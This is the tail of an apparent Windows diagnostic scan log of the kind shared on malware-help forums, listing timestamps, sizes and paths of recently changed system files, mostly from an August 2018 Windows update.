2018-08-31 07:25:18 270336 ----a-w- C:\WINDOWS\System32\spp.dll
2018-08-31 07:25:12 266752 ----a-w- C:\WINDOWS\System32\rstrui.exe
2018-08-31 07:24:35 482304 ----a-w- C:\WINDOWS\System32\srcore.dll
2018-08-31 07:24:33 1127936 ----a-w- C:\WINDOWS\System32\nettrace.dll
2018-08-31 07:23:48 1364992 ----a-w- C:\WINDOWS\System32\bcastdvruserservice.dll
2018-08-31 07:23:34 765440 ----a-w- C:\WINDOWS\System32\tdh.dll
2018-08-31 07:22:53 1855488 ----a-w- C:\WINDOWS\System32\msxml3.dll
2018-08-31 07:22:19 1661440 ----a-w- C:\WINDOWS\System32\GdiPlus.dll
2018-08-31 06:55:04 1455960 ----a-w- C:\WINDOWS\SysWow64\gdi32full.dll
2018-08-31 06:53:26 1327504 ----a-w- C:\WINDOWS\SysWow64\msctf.dll
2018-08-31 06:41:56 43008 ----a-w- C:\WINDOWS\SysWow64\mf3216.dll
2018-08-31 06:41:34 138752 ----a-w- C:\WINDOWS\SysWow64\t2embed.dll
2018-08-31 06:40:01 216576 ----a-w- C:\WINDOWS\SysWow64\spp.dll
2018-08-31 06:37:50 622080 ----a-w- C:\WINDOWS\SysWow64\tdh.dll
2018-08-31 06:37:13 1585664 ----a-w- C:\WINDOWS\SysWow64\msxml3.dll
2018-08-31 06:36:04 1469952 ----a-w- C:\WINDOWS\SysWow64\GdiPlus.dll
2018-08-31 03:50:07 270648 ----a-w- C:\WINDOWS\System32\SgrmEnclave_secure.dll
2018-08-31 03:50:05 273720 ----a-w- C:\WINDOWS\System32\SgrmEnclave.dll
2018-08-31 03:44:28 1222440 ----a-w- C:\WINDOWS\System32\hvix64.exe
2018-08-31 03:44:27 1030952 ----a-w- C:\WINDOWS\System32\hvax64.exe
2018-08-31 03:44:22 76256 ----a-w- C:\WINDOWS\System32\drivers\hvservice.sys
2018-08-31 03:44:19 1064744 ----a-w- C:\WINDOWS\System32\SecConfig.efi
2018-08-31 03:44:18 568600 ----a-w- C:\WINDOWS\System32\tcblaunch.exe
2018-08-31 03:44:15 136488 ----a-w- C:\WINDOWS\System32\hvloader.dll
2018-08-31 03:43:40 722880 ----a-w- C:\WINDOWS\System32\ci.dll
2018-08-31 03:43:19 2719216 ----a-w- C:\WINDOWS\System32\drivers\tcpip.sys
2018-08-31 03:28:56 1989496 ----a-w- C:\WINDOWS\SysWow64\msxml6.dll
2018-08-31 03:28:50 1514352 ----a-w- C:\WINDOWS\SysWow64\WindowsCodecs.dll
2018-08-31 03:28:44 6043680 ----a-w- C:\WINDOWS\SysWow64\windows.storage.dll
2018-08-31 03:28:42 134936 ----a-w- C:\WINDOWS\SysWow64\gdi32.dll
2018-08-31 03:28:38 6570040 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.Protection.PlayReady.dll
2018-08-31 03:28:37 453104 ----a-w- C:\WINDOWS\SysWow64\dpx.dll
2018-08-31 03:28:24 1129728 ----a-w- C:\WINDOWS\SysWow64\msvproc.dll
2018-08-31 03:28:20 568568 ----a-w- C:\WINDOWS\SysWow64\CoreMessaging.dll
2018-08-31 03:26:44 25847808 ----a-w- C:\WINDOWS\System32\edgehtml.dll
2018-08-31 03:21:14 22008320 ----a-w- C:\WINDOWS\SysWow64\edgehtml.dll
2018-08-31 03:18:30 8189440 ----a-w- C:\WINDOWS\System32\Windows.Data.Pdf.dll
2018-08-31 03:17:08 144384 ----a-w- C:\WINDOWS\System32\mssprxy.dll
2018-08-31 03:17:01 20480 ----a-w- C:\WINDOWS\System32\netevent.dll
2018-08-31 03:16:47 6661120 ----a-w- C:\WINDOWS\SysWow64\Windows.Data.Pdf.dll
2018-08-31 03:16:03 4382720 ----a-w- C:\WINDOWS\System32\EdgeContent.dll
2018-08-31 03:15:44 4866560 ----a-w- C:\WINDOWS\System32\jscript9.dll
2018-08-31 03:15:40 3392512 ----a-w- C:\WINDOWS\System32\tquery.dll
2018-08-31 03:15:13 7577088 ----a-w- C:\WINDOWS\System32\Chakra.dll
2018-08-31 03:15:07 894464 ----a-w- C:\WINDOWS\System32\webplatstorageserver.dll
2018-08-31 03:15:03 395776 ----a-w- C:\WINDOWS\System32\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:15:02 75776 ----a-w- C:\WINDOWS\System32\drivers\mpsdrv.sys
2018-08-31 03:14:53 2700288 ----a-w- C:\WINDOWS\SysWow64\tquery.dll
2018-08-31 03:14:50 154112 ----a-w- C:\WINDOWS\System32\Chakradiag.dll
2018-08-31 03:14:42 898560 ----a-w- C:\WINDOWS\System32\WpcWebFilter.dll
2018-08-31 03:14:31 808448 ----a-w- C:\WINDOWS\System32\EdgeManager.dll
2018-08-31 03:14:26 726528 ----a-w- C:\WINDOWS\System32\jscript9diag.dll
2018-08-31 03:13:19 402432 ----a-w- C:\WINDOWS\System32\drivers\ks.sys
2018-08-31 03:13:07 2738688 ----a-w- C:\WINDOWS\System32\mssrch.dll
2018-08-31 03:13:01 1708544 ----a-w- C:\WINDOWS\System32\MSPhotography.dll
2018-08-31 03:12:51 736256 ----a-w- C:\WINDOWS\System32\drivers\srv2.sys
2018-08-31 03:12:36 20480 ----a-w- C:\WINDOWS\SysWow64\netevent.dll
2018-08-31 03:11:38 796672 ----a-w- C:\WINDOWS\System32\mssvp.dll
2018-08-31 03:11:29 2236928 ----a-w- C:\WINDOWS\System32\win32kbase.sys
2018-08-31 03:11:19 1854976 ----a-w- C:\WINDOWS\System32\wevtsvc.dll
2018-08-31 03:11:18 1057792 ----a-w- C:\WINDOWS\System32\SearchIndexer.exe
2018-08-31 03:11:11 604160 ----a-w- C:\WINDOWS\System32\updatehandlers.dll
2018-08-31 03:11:07 406528 ----a-w- C:\WINDOWS\System32\SearchProtocolHost.exe
2018-08-31 03:10:55 608768 ----a-w- C:\WINDOWS\SysWow64\EdgeManager.dll
2018-08-31 03:10:55 1375744 ----a-w- C:\WINDOWS\System32\usocore.dll
2018-08-31 03:10:49 3711488 ----a-w- C:\WINDOWS\SysWow64\jscript9.dll
2018-08-31 03:10:45 5777920 ----a-w- C:\WINDOWS\SysWow64\Chakra.dll
2018-08-31 03:10:42 889344 ----a-w- C:\WINDOWS\System32\schedsvc.dll
2018-08-31 03:10:40 288768 ----a-w- C:\WINDOWS\SysWow64\Search.ProtocolHandler.MAPI2.dll
2018-08-31 03:10:28 1361408 ----a-w- C:\WINDOWS\SysWow64\MSPhotography.dll
2018-08-31 03:10:27 561152 ----a-w- C:\WINDOWS\SysWow64\jscript9diag.dll
2018-08-31 03:10:26 176640 ----a-w- C:\WINDOWS\System32\mssph.dll
2018-08-31 03:09:58 578560 ----a-w- C:\WINDOWS\SysWow64\webplatstorageserver.dll
2018-08-31 03:09:23 2258944 ----a-w- C:\WINDOWS\SysWow64\mssrch.dll
2018-08-31 03:08:28 619520 ----a-w- C:\WINDOWS\SysWow64\WpcWebFilter.dll
2018-08-31 03:07:32 856064 ----a-w- C:\WINDOWS\SysWow64\SearchIndexer.exe
2018-08-31 03:07:14 735744 ----a-w- C:\WINDOWS\SysWow64\mssvp.dll
2018-08-31 03:06:57 345088 ----a-w- C:\WINDOWS\SysWow64\SearchProtocolHost.exe
2018-08-30 04:44:37 152688 ----a-w- C:\WINDOWS\System32\drivers\mbae64.sys
2018-08-28 09:27:28 1952768 ----a-w- C:\WINDOWS\NDE2ZDRjZ.exe
2018-08-28 07:17:55 23862784 ----a-w- C:\WINDOWS\System32\Hydrogen.dll
2018-08-28 06:56:08 1008640 ----a-w- C:\WINDOWS\System32\Windows.Media.MixedRealityCapture.dll
2018-08-28 06:49:46 677376 ----a-w- C:\WINDOWS\System32\HeadTrackerStorage.dll
2018-08-28 06:48:22 1274368 ----a-w- C:\WINDOWS\System32\HoloSI.PCShell.dll
2018-08-28 06:45:57 713216 ----a-w- C:\WINDOWS\System32\SharedRealitySvc.dll
2018-08-28 05:51:14 868864 ----a-w- C:\WINDOWS\SysWow64\Windows.Media.MixedRealityCapture.dll
2018-08-18 00:47:08 563832 ------w- C:\WINDOWS\System32\MpSigStub.exe
.
============= FINISH: 20:06:10.54 ===============